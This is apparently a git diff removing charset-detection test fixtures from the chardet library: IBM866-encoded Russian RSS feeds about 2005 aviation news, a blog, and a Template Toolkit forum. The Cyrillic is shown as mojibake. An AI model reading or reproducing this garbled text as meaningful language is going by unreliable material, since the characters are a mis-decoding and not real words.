¡ א®¢ב×  ­¥ ¢כ«¥ג¨ג ­¨ ®₪¨­ ב ¬®«¥ג. ˆ§ • ¡ א®¢ב×  ¢ ¯¥א¢כ© ₪¥­ל £®₪  ¬®¦­® ¢כ¡א גלבן ג®«ל×® ¯®¥§₪®¬,   ג ×¦¥  ¢ג®גא ­ב¯®אג®¬ - Mon, 02 Jan 2006 13:03:00 +0300 - ¥א¢®£® ן­¢ אן ¨§ • ¡ א®¢ב×  ­¥ ¢כ«¥ג¨ג ­¨ ®₪¨­ ב ¬®«¥ג. ‚®ג × × ¯א®×®¬¬¥­ג¨א®¢ «¨ ב¨גד ז¨מ ×®אא¥ב¯®­₪¥­גד ˆ€ REGNUM ¢ ₪¨ב¯¥גח¥אב×®© • ¡ א®¢ב×®£®  םא®¯®אג : "‘¥£®₪­ן ­¨ ®₪¨­ ב ¬®«¥ג ¨ו • ¡ א®¢ב×  ­¥ ¢כ«¥ג¨ג. ’ × ן ב¨גד ז¨ן ¢ • ¡ א®¢ב×¥ ¢¯¥א¢כ¥. ‘ ¬®«¥גכ ¨§ £®א®₪  ­¥ ¢כ«¥ג מג ­¥ ¯® ¯א¨ח¨­¥ ­¥¨ב¯א ¢­®בג¨,   ¯® ¯א¨ח¨­¥ ®גבדגבג¢¨ן א¥©ב®¢. ג ­ ב ¢ ®¢כ© £®₪ ­¨×ג® ­¨×ד₪  ­¥ «¥ג¨ג. €¢¨ ג®אכ ®ג₪כו מג".ˆ§ • ¡ א®¢ב×  ¢ ¯¥א¢כ© ₪¥­ל £®₪  ¬®¦­® ¢כ¡א גלבן ג®«ל×® ¯®¥§₪®¬,   ג ×¦¥  ¢ג®גא ­ב¯®אג®¬. - - - - - "’א ­ב םא®" א ב×אכ«® בגאד×גדאד  ×ז¨®­¥א­®£® × ¯¨ג «  - http://www.aviaport.ru/news/2005/12/29/99267.html - € "€¢¨ ×®¬¯ ­¨ן "’א ­ב םא®" א ב×אכ«® בגאד×גדאד ב¢®¥£®  ×ז¨®­¥א­®£® × ¯¨ג « . 32,1%  ×ז¨© ×®­גא®«¨אד¥ג "‹®£®‚€‡-‹", 44,1% ¢« ₪¥מג ח«¥­כ ב¥¬ל¨ €. «¥ט ×®¢  - Thu, 29 Dec 2005 17:30:00 +0300 - € "€¢¨ ×®¬¯ ­¨ן "’א ­ב םא®" א ב×אכ«® בגאד×גדאד ב¢®¥£®  ×ז¨®­¥א­®£® × ¯¨ג « .  × ב«¥₪ד¥ג ¨§ ®ה¨ז¨ «ל­כו ¬ ג¥א¨ «®¢ ×®¬¯ ­¨¨, 32,1%  ×ז¨© ×®­גא®«¨אד¥ג "‹®£®‚€‡-‹", 44,1% ¢« ₪¥מג ח«¥­כ ב¥¬ל¨ ¯א¥₪ב¥₪ ג¥«ן ב®¢¥ג  ₪¨א¥×ג®א®¢ "’א ­ב םא®" €«¥×ב ­₪א  «¥ט ×®¢ . "‹®£®‚€‡-‹", דחא¥¦₪¥­­כ© ¢ 1996 £®₪ד ×®¬¯ ­¨¥© "‹®£®‚€‡", ×®­גא®«¨אד¥ג  ×ז¨¨ "’א ­ב םא®" ח¥א¥§ ב¢®¨ ₪®ח¥א­¨¥ בגאד×גדאכ - ‡€ ®א¥©-2" ¨ ‡€ " ג¬¨א+". ® ₪ ­­כ¬ ¨בג®ח­¨×  "ˆ­ג¥אה ×ב " ¢  ¢¨ ז¨®­­®© ®גא ב«¨, ב¥©ח ב "‹®£®‚€‡-‹" ד¦¥ ­¥ ¯א¨­ ₪«¥¦¨ג "‹®£®‚€‡ד".‘®£« ב­® ₪®×ד¬¥­גד, ¯א¥₪ב¥₪ ג¥«מ ב®¢¥ג  ₪¨א¥×ג®א®¢ "’א ­ב םא®" €«¥×ב ­₪אד «¥ט ×®¢ד ¯א¨­ ₪«¥¦¨ג 32,81% ®¡כ×­®¢¥­­כו  ×ז¨©,   ¥£® בד¯אד£¥, £¥­¥א «ל­®¬ד ₪¨א¥×ג®אד € «ל£¥ «¥ט ×®¢®© - 8,08%. א®¬¥ ג®£®, 3,25%  ×ז¨© "’א ­ב םא®" ¯א¨­ ₪«¥¦ ג ¬ ג¥א¨ «¥ט ×®¢ , ¯א¥₪ב¥₪ ג¥«מ ¥¦£®בד₪ אבג¢¥­­®£®  ¢¨ ז¨®­­®£® ×®¬¨ג¥ג  ’ גלן­¥ €­®₪¨­®©.€ "€¢¨ ×®¬¯ ­¨ן "’א ­ב םא®" ¯® ¯ בב ¦¨א®®¡®א®גד ¢ו®₪¨ג ¢ ח¨ב«® ¯ןג¨ ×אד¯­¥©ט¨ו א®בב¨©ברו  ¢¨ ×®¬¯ ­¨©. ‚כאדח×  ®ג א¥ «¨§ ז¨¨ §  11 ¬¥בןז¥¢ 2005 £®₪  - 8,9 ¬«א₪ אד¡«¥©, ¯ בב ¦¨א®®¡®א®ג - 4,8 ¬«א₪ ¯ בב ¦¨א®-ר«®¬¥גא®¢. - - - - - ‚  םא®¯®אגד "דאד¬®ח" ­ ח «  ₪¥©בג¢®¢ גל ­®¢ ן ב¯א ¢®ח­ ן ב¨בג¥¬  TouchTown (‘ ¬ א ) - http://www.aviaport.ru/news/2005/12/29/99266.html - ‚ ¥¦₪ד­ א®₪­®¬  םא®¯®אגד "דאד¬®ח" ­ ח «  ₪¥©בג¢®¢ גל ­®¢ ן ˆ­ה®א¬ ז¨®­­®-ב¯א ¢®ח­ ן ב¨בג¥¬  TouchTown - Thu, 29 Dec 2005 17:27:00 +0300 - ‚ ¥¦₪ד­ א®₪­®¬  םא®¯®אגד "דאד¬®ח" ­ ח «  ₪¥©בג¢®¢ גל ­®¢ ן ˆ­ה®א¬ ז¨®­­®-ב¯א ¢®ח­ ן ב¨בג¥¬  TouchTown, - ב®®¡י¨«¨ ×®אא¥ב¯®­₪¥­גד ˆ€ REGNUM-‚®«£ ˆ­ה®א¬ ¢ ¯א¥בב-ב«ד¦¡¥  םא®¯®אג . ƒ« ¢­כ¬ ₪®בג®¨­בג¢®¬ ב¨בג¥¬כ ן¢«ן¥גבן ®¯¥א ג¨¢­®¥ ¯א¥₪®בג ¢«¥­¨¥ ­¥®¡ו®₪¨¬®© ¯ בב ¦¨אד ¨­ה®א¬ ז¨¨ ב ¨ב¯®«ל§®¢ ­¨¥¬ ¡¥§£א ­¨ח­כו ¢®§¬®¦­®בג¥© ¬ד«לג¨¬¥₪¨ . ’¥¯¥אל  ¢¨ ¯ בב ¦¨אכ ¯א¨ ¯®¬®י¨ ב¥­ב®א­®£® ג¥א¬¨­ «  ¬®£דג ¯®«דח¨גל ¯א ×ג¨ח¥בר «מ¡דמ ¨­ה®א¬ ז¨מ ­¥ ג®«ל×® ®¡  םא®¯®אג¥, ­® ¨ ¯® ‘ ¬ א¥ ¢ ז¥«®¬. ’ ×, ₪ ­­כ¥ ב¨בג¥¬כ "TouchTown" ¯®₪¥«¥­כ ­  ₪¢  ¡«®× : "דג¥¢®₪¨ג¥«ל ¯® ¥¦₪ד­ א®₪­®¬ד  םא®¯®אגד "דאד¬®ח" (§₪¥בל ¯ בב ¦¨אכ ¬®£דג ¯®§­ ×®¬¨גלבן ב ¯« ­®¬ ¯®¬¥י¥­¨©  םא®¯®אג  ¨ ¯א¨«¥£ מי¥© × ­¥¬ד ג¥אא¨ג®א¨¨,   ג ×¦¥ ד§­ גל ® ¯א¥₪®בג ¢«ן¥¬כו דב«ד£ ו) ¨ "‚בן ‘ ¬ א " (¢ ¡«®×¥ ב®₪¥א¦¨גבן ¨­ה®א¬ ז¨ן ® £®בג¨­¨ז ו, ¬¥בג ו ®ג₪כו , א §¢«¥× ג¥«ל­כו ¨ ג®א£®¢כו ז¥­גא ו, ×®¬¯ ­¨ןו, ®× §כ¢ מי¨ו א §«¨ח­כ¥ ¯®גא¥¡¨ג¥«לבר¥ דב«ד£¨). - - - - - •ƒ€ ¯א¨§כ¢ ¥ג ¦דא­ «¨בג®¢ ¡כגל ¬ ×ב¨¬ «ל­® ×®אא¥×ג­כ¬¨ ¢ ב®®¡י¥­¨ןו ® א ¡®ג¥ ×®¬¨בב¨¨ ¯® א בב«¥₪®¢ ­¨מ ¯א¨ח¨­ × ג בגא®הכ ב ¬®«¥ג  €­-140-100 - http://www.aviaport.ru/news/2005/12/29/99265.html - ‚  ×ד ב®בג®ן« בל ¯א¥בב-×®­ה¥א¥­ז¨ן ¯® ¨ג®£ ¬ ¯א¥₪¢ א¨ג¥«ל­®£® א בב«¥₪®¢ ­¨ן ¯א¨ח¨­ × ג בגא®הכ ב ¬®«¥ג  €­-140-100 - Thu, 29 Dec 2005 17:18:00 +0300 - 28 ₪¥× ¡אן 2005 £. ¢  ×ד ב®בג®ן« בל ¯א¥בב-×®­ה¥א¥­ז¨ן ¯® ¨ג®£ ¬ ¯א¥₪¢ א¨ג¥«ל­®£® א בב«¥₪®¢ ­¨ן ¯א¨ח¨­ × ג בגא®הכ ב ¬®«¥ג  €­-140-100. א¥§ד«לג ג ו א ¡®גכ ₪®«®¦¨«¨ ®ג ¨¬¥­¨ ×®¬¨בב¨¨ ¯® א בב«¥₪®¢ ­¨מ „¦ ו ­£¨א €ב×¥א®¢ - £¥­¥א «ל­כ© ₪¨א¥×ג®א £®בד₪ אבג¢¥­­®£® ×®­ז¥א­  AZAL,  ¢¥«  ד¬¥­×® - £¥­¥א «ל­כ© ₪¨א¥×ג®א • אל×®¢ב×®£® £®בד₪ אבג¢¥­­®£®  ¢¨ ז¨®­­®£® ¯א®¨§¢®₪בג¢¥­­®£® ¯א¥₪¯א¨ןג¨ן, ®א¨ב ƒ®אמ­®¢ - ¯א¥₪בג ¢¨ג¥«ל ¥¦£®בד₪ אבג¢¥­­®£® €¢¨ ז¨®­­®£® ®¬¨ג¥ג , ‚¨ג «¨© ¨י¥­×® - ₪¨א¥×ג®א ₪¥¯ אג ¬¥­ג  ¨­ב¯¥×ג¨א®¢ ­¨ן ¡¥§®¯ ב­®בג¨ ¯®«¥ג®¢ ƒ®ב ¢¨ ב«ד¦¡כ “×א ¨­כ, ˆ«ל£ ¬ €¬¨א®¢ - ¯א¥₪ב¥₪ ג¥«ל ג¥ו­¨ח¥ב×®© ×®¬¨בב¨¨ ¯® א בב«¥₪®¢ ­¨מ × ג בגא®הכ. ‚® ¢א¥¬ן ¯א¥בב-×®­ה¥א¥­ז¨¨ ¡כ«  ®£« ט¥­  ב«¥₪דמי ן ¨­ה®א¬ ז¨ן.23 ₪¥× ¡אן 2005 £. ¯®ב«¥ ¢כ«¥ג  ¨§  םא®¯®אג   ×ד ¯®ג¥א¯¥« × ג בגא®הד ¢ א ©®­¥ ¯®ב¥«×   א₪ א ­ ­  ¯®¡¥א¥¦ל¥  ב¯¨©ב×®£® ¬®אן ב ¬®«¥ג €­-140-100 (­ ז¨®­ «ל­כ© ¨ א¥£¨בגא ז¨®­­כ© §­ × 4-AZ48)  ז¨®­ «ל­®©  ¢¨ ×®¬¯ ­¨¨ "€§¥א¡ ©₪¦ ­ • ¢  ‰®«« אכ". ‘ ¬®«¥ג, ¢כ¯®«­ן¢ט¨© א¥©ב AHY 217 ¯® ¬ אטאדגד  ×ד (€§¥א¡ ©₪¦ ­) - €×ג ד ( § ובג ­) ¨¬¥« ­  ¡®אגד 18 ¯ בב ¦¨א®¢ ¨ 5 ח«¥­®¢ םר¯ ¦  (×®¬ ­₪¨א ‹ ¢א¨­ €.€.). ‚ א¥§ד«לג ג¥ × ג בגא®הכ ¯®£¨¡«® 23 ח¥«®¢¥× , ­ ו®₪¨¢ט¨ובן ¢ ב ¬®«¥ג¥, ¢ ג®¬ ח¨ב«¥ 5 ח«¥­®¢ םר¯ ¦  ¨ 18 ¯ בב ¦¨א®¢, בא¥₪¨ ×®ג®אכו ¡כ«¨ £א ¦₪ ­¥ €§¥א¡ ©₪¦ ­  (10), €¢בגא «¨¨ (1), ‚¥«¨×®¡א¨ג ­¨¨ (1), ƒאד§¨¨ (1),  § ובג ­  (4), ¨ ’דאז¨¨ (1). ‚‘ ¯®«­®בגלמ א §אדט¥­®.‚ א¥§ד«לג ג¥ ®א£ ­¨§®¢ ­­®£® ¯®¨ב×  ®¡«®¬×¨ ‚‘ ¡כ«¨ ®¡­ אד¦¥­כ ­  ¡¥א¥£®¢®© ח¥אג¥ ¢ א ©®­¥ ­ ב¥«¥­­®£® ¯ד­×ג   א₪ א ­. א®¢¥₪¥­¨¥  ¢ א¨©­®-ב¯ ב ג¥«ל­כו א ¡®ג ®ב«®¦­ן«®בל ג¥¬­כ¬ ¢א¥¬¥­¥¬ בדג®× ¨ ­¥¡« £®¯א¨ןג­כ¬¨ ¯®£®₪­כ¬¨ דב«®¢¨ן¬¨ (­¨§× ן ®¡« ח­®בגל, ₪®¦₪ל, ¢¥ג¥א ¨ ¢®«­¥­¨¥ ¬®אן). ¯®¨ב×®¢כ¬ א ¡®ג ¬ ­¥¬¥₪«¥­­® ¡כ«¨ ¯א¨¢«¥ח¥­כ ב¨«כ  ¢ א¨©­®-ב¯ ב ג¥«ל­כו ב«ד¦¡, ‚„, ƒ®בד₪ אבג¢¥­­®© ¯®£א ­¨ח­®© ב«ד¦¡כ, ƒא ¦₪ ­ב×®© ®¡®א®­כ ¥ב¯ד¡«¨×¨ €§¥א¡ ©₪¦ ­. ‚ ו®₪¥ א ¡®ג ¡כ«¨ ם¢ ×ד¨א®¢ ­כ ®בג ­×¨ ¢ב¥ו ¯®£¨¡ט¨ו. א®₪®«¦ מגבן א ¡®גכ ¯® ¯®¨ב×ד ¨ ¨§¢«¥ח¥­¨מ ¨§ ¬®אן הא £¬¥­ג®¢ ‚‘.®¬¨בב¨ן ¯® א בב«¥₪®¢ ­¨מ  ¢¨ × ג בגא®הכ ב ¬®«¥ג  €­-140-100 4-AZ48, ¨§דח¨¢ ₪ ­­כ¥ ®¡ך¥×ג¨¢­®£® ×®­גא®«ן, ב­ןגכ¥ ב § י¨י¥­­®£® ¡®אג®¢®£® ­ ×®¯¨ג¥«ן דבגא®©בג¢  א¥£¨בגא ז¨¨ “-92€,   ג ×¦¥, ב®¯®בג ¢¨¢ ¨ו ב ¨­ה®א¬ ז¨¥© ₪¨ב¯¥גח¥אברו ב«ד¦¡, ¬ ג¥א¨ « ¬¨, ב®¡א ­­כ¬¨ ­  ¬¥בג¥ × ג בגא®הכ, ¢®בבג ­®¢¨«  ¯א¥₪¢ א¨ג¥«ל­® ב«¥₪דמידמ × אג¨­ד ב®¡כג¨©.‚§«¥ג ב®בג®ן«בן ¢ ב®®ג¢¥גבג¢¨¨ ב א ב¯¨ב ­¨¥¬.   םג ¯¥ ­ ¡®א  ¢כב®גכ ¯א®¨§®ט«® ד׫®­¥­¨¥ ¢®§₪דט­®£® בד₪­  (‚‘) ®ג דבג ­®¢«¥­­®© גא ¥×ג®א¨¨ ¯®«¥ג . ‡ ג¥¬ םר¯ ¦ ב®®¡י¨« ב«ד¦¡¥ “‚„ ® ג¥ו­¨ח¥ברו ¯א®¡«¥¬ ו ­  ¡®אגד ‚‘. —¥א¥§ ­¥ב×®«ל×® ב¥×ד­₪ ב¢ן§ל ב םר¯ ¦¥¬ ¯א®¯ « ,   ®ג¬¥ג×  ‚‘ ¨בח¥§«  ב ם×א ­®¢ א ₪ א . ® ₪ ­­כ¬ ®¡ך¥×ג¨¢­®£® ×®­גא®«ן ¯®ב«¥ ­ ¡®א  ¢כב®גכ ₪® 2100 ¬ ב ¬®«¥ג ­ ח « ב­¨¦¥­¨¥ ¯® ­¨בו®₪ןי¥© ב¯¨א «¨ ב ד¬¥­לט מי¨¬¨בן א ₪¨דב ¬¨ ®ג 500 ¬ ₪® 100 ¬, ב®¢¥אט¨¢ ¯א¨ םג®¬ 4,5 ¢¨ג× . בט¨הא®¢×  ¡®אג®¢®£® דבגא®©בג¢  א¥£¨בגא ז¨¨ ¯®× § « , חג® ₪¢¨£ ג¥«¨ ‚‘, ב¨בג¥¬כ ד¯א ¢«¥­¨ן, ם­¥א£®ב­ ¡¦¥­¨ן ¨ ₪אד£¨¥ ¡כ«¨ ¨ב¯א ¢­כ ¨ א ¡®ג®ב¯®ב®¡­כ.  םג ¯¥ ­ ¡®א  ¢כב®גכ ¡®אג®¢כ¬ דבגא®©בג¢®¬ א¥£¨בגא ז¨¨ ¡כ«® § ה¨×ב¨א®¢ ­® ®₪­®¢א¥¬¥­­®¥ ®גבדגבג¢¨¥ ¨­₪¨× ז¨¨ םר¯ ¦ד ¢ב¥ו גא¥ו  ¢¨ £®א¨§®­ג®¢ ( ¢¨ £®א¨§®­ג - ¯א¨¡®א, ¯®× §כ¢ מי¨© םר¯ ¦ד ¯®«®¦¥­¨¥ ‚‘ ¢ ¯א®בגא ­בג¢¥). ­ בג®ןי¥¬ד ¢א¥¬¥­¨ ¯א¨ח¨­  ®גבדגבג¢¨ן ¨­₪¨× ז¨¨  ¢¨ £®א¨§®­ג®¢ ­¥ דבג ­®¢«¥­ . ƒ¥­¥א «ל­כ© ₪¨א¥×ג®א ×®­ז¥א­  AZAL „¦ ו ­£¨א €ב×¥א®¢ § ן¢¨« ­  ¯א¥בב-×®­הא¥­ז¨¨: "ג  ב¨גד ז¨ן ­¥ בג ­₪ אג­ ן ¨ ד­¨× «ל­ ן, ¯®םג®¬ד ג®, חג® ¯א®¨§®ט«®, ן¢«ן¥גבן ב«¥₪בג¢¨¥¬ ­¥×¨ו ב®¡כג¨©, ×®ג®אכ¥ ¡ד₪דג ¨§דח גלבן".  ¡®ג  ×®¬¨בב¨¨ ¯א®₪®«¦ ¥גבן.® א¥×®¬¥­₪ ז¨¨ ×®¬¨בב¨¨ א ¢¨ג¥«לבג¢® €§¥א¡ ©₪¦ ­  ¯א¨­ן«® א¥ט¥­¨¥ ¢א¥¬¥­­® ¯א¨®בג ­®¢¨גל, ₪® § ¢¥אט¥­¨ן א בב«¥₪®¢ ­¨ן × ג בגא®הכ, ם×ב¯«ד ג ז¨מ €­-140-100 ¢  ¢¨ ×®¬¯ ­¨¨ "€§¥א¡ ©₪¦ ­ • ¢  ‰®«« אכ". ®­גא ×ג ¬¥¦₪ד ×®­ז¥א­®¬ AZAL ¨ • אל×®¢בר¬ £®בד₪ אבג¢¥­­כ¬  ¢¨ ז¨®­­כ¬ ¯א®¨§¢®₪בג¢¥­­כ¬ ¯א¥₪¯א¨ןג¨¥¬ ®בג ¥גבן ¢ ב¨«¥, ®₪­ ×® בא®×¨ ¢כ¯®«­¥­¨ן ¥£® ¡ד₪דג ב×®אא¥×ג¨א®¢ ­כ ב דח¥ג®¬ ®×®­ח ג¥«ל­כו ¢כ¢®₪®¢ ×®¬¨בב¨¨, ×®ג®אכ¥ ®£« בןג ¯® א¥§ד«לג ג ¬ א בב«¥₪®¢ ­¨ן × ג בגא®הכ ב ¬®«¥ג  €­-140-100, ¯א®¨§®ט¥₪ט¥© 23 ₪¥× ¡אן 2005 £®₪ .  ¯א¥בב-×®­ה¥א¥­ז¨¨, ב®בג®ן¢ט¥©בן 28 ₪¥× ¡אן ¢  ×ד, ¡כ«® ®£« ט¥­® § ן¢«¥­¨¥ ×®¬¨בב¨¨ ¯® א בב«¥₪®¢ ­¨מ ¯א¨ח¨­ × ג בגא®הכ, ב®£« ב®¢ ­­®¥ ב® ¢ב¥¬¨ ¥¥ דח בג­¨× ¬¨, ¢ ג®¬ ח¨ב«¥ ¨ ב ¯א¥₪בג ¢¨ג¥«ן¬¨ •ƒ€. ®םג®¬ד ¯ד¡«¨× ז¨¨ אן₪  ם«¥×גא®­­כו ‘ˆ, ב®₪¥א¦ י¨¥ ¨­ה®א¬ ז¨מ ® ג®¬, "חג® ¯א®¨§¢®₪¨ג¥«¨ ב ¬®«¥ג®¢ ­¥ ב®£« ב­כ ב ¢כ¢®₪ ¬¨ ×®¬¨בב¨¨", ­¥ ב®®ג¢¥גבג¢דמג ₪¥©בג¢¨ג¥«ל­®בג¨.•ƒ€ ®¡א י ¥ג ¢­¨¬ ­¨¥ ­  ­¥₪®¯דבג¨¬®בגל ¯א®¨§¢®«ל­כו ¨­ג¥א¯א¥ג ז¨© ¯®§¨ז¨¨ ¯א¥₪¯א¨ןג¨ן ¨ ¯®₪ח¥אר¢ ¥ג, חג® ­¨ ¢ ®₪­®¬ ¨§ ¨­ג¥א¢למ, ₪ ­­®¬ ¯א¥₪בג ¢¨ג¥«ן¬ ‘ˆ, ­¨ ®₪¨­ ¨§ אד×®¢®₪¨ג¥«¥© ¯א¥₪¯א¨ןג¨ן ­¥ ¢כב× §כ¢ « ­¨ ¢¥אב¨© × ג בגא®הכ ב ¬®«¥ג  €­-140-100, ­¨ ¬­¥­¨©, ¯א®ג¨¢®א¥ח י¨ו ¢כ¢®₪ ¬ ×®¬¨בב¨¨ ¯® ¥¥ א בב«¥₪®¢ ­¨מ. - - - - - €םא®¯®אג "•¥אב®­" ¨י¥ג ®ז¥­י¨×  - http://www.aviaport.ru/news/2005/12/29/99264.html - ‹¨×¢¨₪¨אד¥¬®¥ ×®¬¬ד­ «ל­®¥ ¯א¥₪¯א¨ןג¨¥ "€םא®¯®אג "•¥אב®­" ®¡ךן¢¨«® ×®­×דאב ¯® ®ג¡®אד ®ז¥­י¨×  ב¢®¥£® ז¥«®בג­®-¨¬די¥בג¢¥­­®£® ×®¬¯«¥×ב  - Thu, 29 Dec 2005 16:57:00 +0300 - ‹¨×¢¨₪¨אד¥¬®¥ ×®¬¬ד­ «ל­®¥ ¯א¥₪¯א¨ןג¨¥ "€םא®¯®אג "•¥אב®­" ®¡ךן¢¨«® ×®­×דאב ¯® ®ג¡®אד ®ז¥­י¨×  ב¢®¥£® ז¥«®בג­®-¨¬די¥בג¢¥­­®£® ×®¬¯«¥×ב .¡ םג®¬ £®¢®א¨גבן ¢ ב®®¡י¥­¨¨  םא®¯®אג , ב®®¡י ¥ג “×א ץ­בל× \ No newline at end of file diff --git a/chardet/tests/IBM866/blog.mlmaster.com.xml b/chardet/tests/IBM866/blog.mlmaster.com.xml deleted file mode 100644 index a6f0258..0000000 --- a/chardet/tests/IBM866/blog.mlmaster.com.xml +++ /dev/null @@ -1,170 +0,0 @@ - - - - - - - chub@tosy - http://blog.mlmaster.com - love & peace ! - Wed, 28 Dec 2005 08:53:15 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ‘ ƒ! - http://blog.mlmaster.com/?p=296 - http://blog.mlmaster.com/?p=296#comments - Wed, 28 Dec 2005 08:53:15 +0000 - danil - - General - http://blog.mlmaster.com/?p=296 - - http://blog.mlmaster.com/?feed=rss2&p=296 - - - ®₪£®ג®¢×  × מ¡¨«¥מ - http://blog.mlmaster.com/?p=295 - http://blog.mlmaster.com/?p=295#comments - Wed, 21 Dec 2005 19:43:43 +0000 - site admin - - General - http://blog.mlmaster.com/?p=295 - - http://blog.mlmaster.com/?feed=rss2&p=295 - - -  ט¨ ¬¨«כ¥ § £א ­¨ח­כ¥ ₪אד§לן - http://blog.mlmaster.com/?p=294 - http://blog.mlmaster.com/?p=294#comments - Fri, 16 Dec 2005 09:19:20 +0000 - danil - - General - http://blog.mlmaster.com/?p=294 - - http://blog.mlmaster.com/?feed=rss2&p=294 - - - ‘« ¢¥­, ­ד¦­  ב¢ן§ל. - http://blog.mlmaster.com/?p=293 - http://blog.mlmaster.com/?p=293#comments - Wed, 14 Dec 2005 14:36:19 +0000 - RuAnShi - - General - http://blog.mlmaster.com/?p=293 - - http://blog.mlmaster.com/?feed=rss2&p=293 - - - € ×®¬ד ה¥בג¨¢ «¥© - http://blog.mlmaster.com/?p=292 - http://blog.mlmaster.com/?p=292#comments - Tue, 06 Dec 2005 16:21:26 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=292 - - http://blog.mlmaster.com/?feed=rss2&p=292 - - - Exit the movie - http://blog.mlmaster.com/?p=291 - http://blog.mlmaster.com/?p=291#comments - Mon, 05 Dec 2005 18:01:09 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=291 - - http://blog.mlmaster.com/?feed=rss2&p=291 - - - ¨טגן× - http://blog.mlmaster.com/?p=289 - http://blog.mlmaster.com/?p=289#comments - Mon, 05 Dec 2005 14:37:11 +0000 - danil - - General - http://blog.mlmaster.com/?p=289 - - http://blog.mlmaster.com/?feed=rss2&p=289 - - - €«¨ב  - http://blog.mlmaster.com/?p=288 - http://blog.mlmaster.com/?p=288#comments - Tue, 29 Nov 2005 08:58:22 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=288 - - http://blog.mlmaster.com/?feed=rss2&p=288 - - - ‚¥«®¬ א ה®­ - http://blog.mlmaster.com/?p=287 - http://blog.mlmaster.com/?p=287#comments - Tue, 29 Nov 2005 08:55:52 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=287 - - http://blog.mlmaster.com/?feed=rss2&p=287 - - - ®«¥ב  - http://blog.mlmaster.com/?p=286 - http://blog.mlmaster.com/?p=286#comments - Tue, 29 Nov 2005 08:52:59 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=286 - - http://blog.mlmaster.com/?feed=rss2&p=286 - - - diff --git a/chardet/tests/IBM866/forum.template-toolkit.ru.1.xml b/chardet/tests/IBM866/forum.template-toolkit.ru.1.xml deleted file mode 100644 index f02f82a..0000000 --- a/chardet/tests/IBM866/forum.template-toolkit.ru.1.xml +++ /dev/null @@ -1,428 +0,0 @@ - - - - - ”®אד¬כ Template Toolkit :  ¡®ג  ב Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-1.html?rss - Template Toolkit - ¡כבגא ן, ¬®י­ ן ¨ א בט¨אן¥¬ ן ב¨בג¥¬  ®¡א ¡®גר ט ¡«®­®¢.   ב ©ג¥ א ¡®ג ¥ג ה®אד¬, ¢ ×®ג®א®¬ ®¡בד¦₪ מגבן ¢®¯א®בכ ¨ב¯®«ל§®¢ ­¨ן ¡¨¡«¨®ג¥×¨ ¯® א ¡®ג¥ ב ט ¡«®­ ¬¨. ‡­ ×®¬בג¢® ב Template Toolkit. ‚®§¬®¦­®בג¨ ¡¨¡«¨®ג¥×¨, ¯א¨¥¬כ ¨ב¯®«ל§®¢ ­¨ן. א®¡«¥¬כ ¨ ¨ו א¥ט¥­¨¥. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 12 Dec 2005 10:09:35 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט ¡«®­כ ¢ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - Wed, 7 Dec 2005 11:19:46 GMT - Template::Plugin::XML::RSS - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - ¯א¨ ¨ב¯®«ל§®¢ ­¨¨ Template::Plugin::XML::RSS ¢¥בל ¢כ¢®₪ ¨§ ₪¢¨¦×  Template בא §ד ­ ח¨­ ¥ג ₪¥« גלבן ¢ UTF-8.  ¡ב®«מג­® ¢¥בל. ’דג ה®אד¬ ¢א®₪¥ × × ¢ RSS ₪ ­­כ¥ א ­¨ג ¨ ×®₪¨א®¢×  koi-8-r א ¡®ג ¥ג.<br /> -¯א¨ םג®¬ ¢ב¥ ¯®¯כגר ¯¥א¥₪ גל ¢ ×®­בגא×דג®א XML::RSS-&gt;new (encode =&gt; '¬®ן_×®₪¨א®¢× ') ::RSS-&gt;new ( output =&gt; '¬®ן_×®₪¨א®¢× ') ­¥ ¯א®× גכ¢ ¥ג :-(<br /> -¨§דח¥­¨¥ א¥§ד«לג ג  ¯א¨ DEBUG_ALL ­¨ × ח¥¬ד ­¥ ¯א¨¢¥«¨. ¢ גא בב¨א®¢×¥ ₪¥¡ £  ¢ב¥ ₪ ­­כ¥ ¨₪דג ¢ ­ד¦­®© ¬­¥ ×®₪¨א®¢×¥. .ג.¥. ¡¥§ ¯¥א¥×®₪¨א®¢ ­¨¨ ₪¢¨¦×®¬ TT2<br /> -<br /> -¬®¦¥ג £₪¥-ג® םג®ג ¯« £¨­ ¯¥א¥×אכ¢ ¥ג TT2-ט­כ© $output ?<br /> -<br /> -¢®ג ג × ן ×®­בגאד×ז¨ן:<br /> -[% USE news = XML.RSS('forum_1.xml') %]<br /> -[% FOREACH item = news.items %]<br /> -&lt;pre&gt;<br /> - [% item.title %]<br /> -&lt;/pre&gt;<br /> -[% END %] - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-120.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - Thu, 1 Dec 2005 09:33:45 GMT - „¢  include-× ג «®£  - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - “ ¬¥­ן ג × ן ב¨גד ז¨ן. ƒאד¯¯  ב ©ג®¢ (טגד× 10) ¨¬¥מג ¯®חג¨ ®₪¨­ ×®¢®¥ ®ה®א¬«¥­¨¥. ‘ ©גכ ב₪¥« ­כ ­  TT2. ‘¥©ח ב ד × ¦₪®£® ב ©ג  ב¢®© templates × ג «®£.<br /> -® ¬­®£¨¥ ה ©«כ ®₪¨­ ×®¢כ (­¥ ¢ב¥).<br /> -ג® ­¥ ®ח¥­ל ד₪®¡­®, ®¡­®¢«ןגל ¢ 10 ¬¥בג ו.<br /> -<br /> - × ב₪¥« גל ₪¢  include × ג «®£  ד TT חג®¡כ ®­ ¨ב× « ב­ ח «  ¢ ®₪­®¬ × ג «®£¥(­ ¯א¨¬¥א ®¡י¥¬ template),   ¥ב«¨ ­¥ ­ ט¥« - ¢ 